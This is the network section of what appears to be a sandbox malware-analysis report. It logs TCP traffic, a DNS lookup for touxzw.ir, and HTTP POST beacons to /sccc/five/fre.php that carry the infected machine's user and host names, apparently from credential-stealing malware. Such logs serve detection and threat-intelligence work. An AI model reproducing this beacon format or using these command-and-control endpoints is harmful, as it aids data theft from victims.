Feb 20, 2025 15:07:55.591232061 CET	80	50029	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:55.591382980 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:55.591547012 CET	80	50029	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:55.591607094 CET	50029	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:55.596523046 CET	80	50029	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:56.760256052 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:56.765379906 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:56.765501976 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:56.767504930 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:56.772510052 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:56.772588015 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:56.777621984 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:57.503592968 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:57.503817081 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:57.504518032 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:57.504585981 CET	50030	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:57.511411905 CET	80	50030	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:58.665731907 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:58.671135902 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:58.671284914 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:58.674216032 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:58.679259062 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:58.679413080 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:58.689690113 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:59.610399008 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:59.610783100 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:59.611037016 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:07:59.611126900 CET	50031	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:07:59.615828991 CET	80	50031	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:00.781179905 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:00.786416054 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:00.786529064 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:00.789520025 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:00.794580936 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:00.794677973 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:00.799691916 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:01.538141012 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:01.538369894 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:01.539643049 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:01.539714098 CET	50032	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:01.543463945 CET	80	50032	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:02.724849939 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:02.730072975 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:02.730221033 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:02.733177900 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:02.738212109 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:02.738306046 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:02.743339062 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:03.583019972 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:03.583168983 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:03.583178997 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:03.583259106 CET	50033	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:03.588219881 CET	80	50033	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:04.735234976 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:04.740442038 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:04.740583897 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:04.742496014 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:04.747565985 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:04.747632027 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:04.752602100 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:05.507750988 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:05.508007050 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:05.508807898 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:05.509506941 CET	50034	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:05.513427973 CET	80	50034	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:06.674308062 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:06.679397106 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:06.682564974 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:06.684638977 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:06.689606905 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:06.689666986 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:06.694679022 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:07.579685926 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:07.579900980 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:07.582284927 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:07.582355976 CET	50036	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:07.584891081 CET	80	50036	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:08.753511906 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:08.759191990 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:08.759310961 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:08.761281967 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:08.766371012 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:08.766511917 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:08.771500111 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:09.582328081 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:09.585159063 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:09.586577892 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:09.586625099 CET	50037	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:09.590106964 CET	80	50037	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:10.736689091 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:10.744306087 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:10.744395018 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:10.746460915 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:10.754379034 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:10.754451990 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:10.762553930 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:11.586926937 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:11.587147951 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:11.587440968 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:11.587496042 CET	50038	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:11.592353106 CET	80	50038	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:12.757056952 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:12.762200117 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:12.762296915 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:12.764056921 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:12.768999100 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:12.769110918 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:12.774226904 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:13.585680008 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:13.585876942 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:13.586024046 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:13.586081028 CET	50039	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:13.590883970 CET	80	50039	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:14.736246109 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:14.741337061 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:14.741439104 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:14.744368076 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:14.749326944 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:14.749378920 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:14.754363060 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:15.626003027 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:15.626305103 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:15.627531052 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:15.627580881 CET	50040	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:15.632064104 CET	80	50040	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:16.778155088 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:16.784864902 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:16.784986973 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:16.787025928 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:16.794250011 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:16.794399023 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:16.803668022 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:17.604955912 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:17.605129957 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:17.605813980 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:17.605865002 CET	50041	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:17.610735893 CET	80	50041	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:18.759536028 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:18.764786005 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:18.764923096 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:18.766771078 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:18.771733046 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:18.771826982 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:18.777021885 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:19.519537926 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:19.519831896 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:19.524244070 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:19.524322987 CET	50042	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:19.524923086 CET	80	50042	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:20.691163063 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:20.696962118 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:20.697093010 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:20.699160099 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:20.704674006 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:20.704781055 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:20.709747076 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:21.479804993 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:21.480010986 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:21.480489969 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:21.480556011 CET	50043	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:21.485114098 CET	80	50043	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:22.671988010 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:22.679263115 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:22.679374933 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:22.682341099 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:22.688117981 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:22.688183069 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:22.693541050 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:23.425607920 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:23.425796032 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:23.426182985 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:23.426242113 CET	50044	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:23.430967093 CET	80	50044	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:24.573353052 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:24.578433037 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:24.578538895 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:24.580570936 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:24.585561037 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:24.585638046 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:24.590635061 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:25.335839033 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:25.336034060 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:25.336122990 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:25.336179018 CET	50045	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:25.341026068 CET	80	50045	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:26.514349937 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:26.519464016 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:26.519578934 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:26.521337986 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:26.526365042 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:26.526443958 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:26.532354116 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:27.274243116 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:27.274513960 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:27.275121927 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:27.275178909 CET	50046	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:27.280411959 CET	80	50046	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:28.424333096 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:28.429656029 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:28.429753065 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:28.432694912 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:28.437731981 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:28.437803030 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:28.442759991 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:29.244296074 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:29.245138884 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:29.245218039 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:29.247879028 CET	50047	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:29.252882957 CET	80	50047	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:30.424670935 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:30.430535078 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:30.430635929 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:30.441991091 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:30.447031975 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:30.447082996 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:30.452445030 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:31.240986109 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:31.241230011 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:31.242221117 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:31.242283106 CET	50048	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:31.246273994 CET	80	50048	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:32.403228998 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:32.408263922 CET	80	50049	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:32.408366919 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:32.410484076 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:32.416462898 CET	80	50049	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:32.416537046 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:32.421569109 CET	80	50049	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:33.259747028 CET	80	50049	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:33.260561943 CET	80	50049	104.21.80.1	192.168.2.6
Feb 20, 2025 15:08:33.261507988 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:33.261507988 CET	50049	80	192.168.2.6	104.21.80.1
Feb 20, 2025 15:08:33.268248081 CET	80	50049	104.21.80.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 20, 2025 15:06:30.029512882 CET	60636	53	192.168.2.6	1.1.1.1
Feb 20, 2025 15:06:30.063524008 CET	53	60636	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 20, 2025 15:06:30.029512882 CET	192.168.2.6	1.1.1.1	0x35eb	Standard query (0)	touxzw.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.80.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.32.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.16.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.112.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.48.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.96.1	A (IP address)	IN (0x0001)	false
Feb 20, 2025 15:06:30.063524008 CET	1.1.1.1	192.168.2.6	0x35eb	No error (0)	touxzw.ir	104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

touxzw.ir

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49710	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:30.076369047 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 188 Connection: close
Feb 20, 2025 15:06:30.081384897 CET	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer088753ENGINEER-PCk0FDD42EE188E931437F4FBE2CU9TCz
Feb 20, 2025 15:06:30.962362051 CET	812	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejmjLELI6A8yqeiJ0CTRpB7CSnqbKcN70UJl8A%2B6HAPsmkvus7NoVux2PmgRf%2FDbBYi5T4Qkks73jyGQ17yQ4YL2PRSRoJeff2tmXt4j%2FiFwJgypNyfAgzTpcYM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0ec0783143d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2204&rtt_var=1102&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:32.109662056 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 188 Connection: close
Feb 20, 2025 15:06:32.114665985 CET	188	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: 'ckav.ruengineer088753ENGINEER-PC+0FDD42EE188E931437F4FBE2CD5cdj
Feb 20, 2025 15:06:32.871561050 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 20 Feb 2025 14:06:32 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/sccc/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YtwHJjxFLCi4DU5TkYrWOACUwYPVW4SF4%2BjVMerIBylZ6PqOPh5w5LIpep8YA9RoM7aPa%2BJBWkJq6RoGHKo6VhDi0%2FE8GU4dnSaJcYPFDgrkt1vJaVULnzSAZ4s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0ecd3b10c44d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=426&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49712	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:32.968614101 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:32.976600885 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
Feb 20, 2025 15:06:33.744920969 CET	842	IN	HTTP/1.1 404 Not Found Date: Thu, 20 Feb 2025 14:06:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eN45DvqFlMmxdn8D%2BIlmoAyJxN7DtIcXVLpjLPaxSyZBgdyvJNa9SwzPsQL5K3916SvOKzhR6B%2BizM6Xf9aVkMeWxzLXTZslDhsBTjBk7VCHeQyiEmx68Jv%2F3cs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 914f0ed29a2a427f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1668&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49719	104.21.80.1	80	3968	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 20, 2025 15:06:34.906991959 CET	238	OUT	POST /sccc/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D509030 Content-Length: 161 Connection: close
Feb 20, 2025 15:06:34.912048101 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 30 00 38 00 38 00 37 00 35 00 33 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50 Data Ascii: (ckav.ruengineer088753ENGINEER-PC0FDD42EE188E931437F4FBE2C
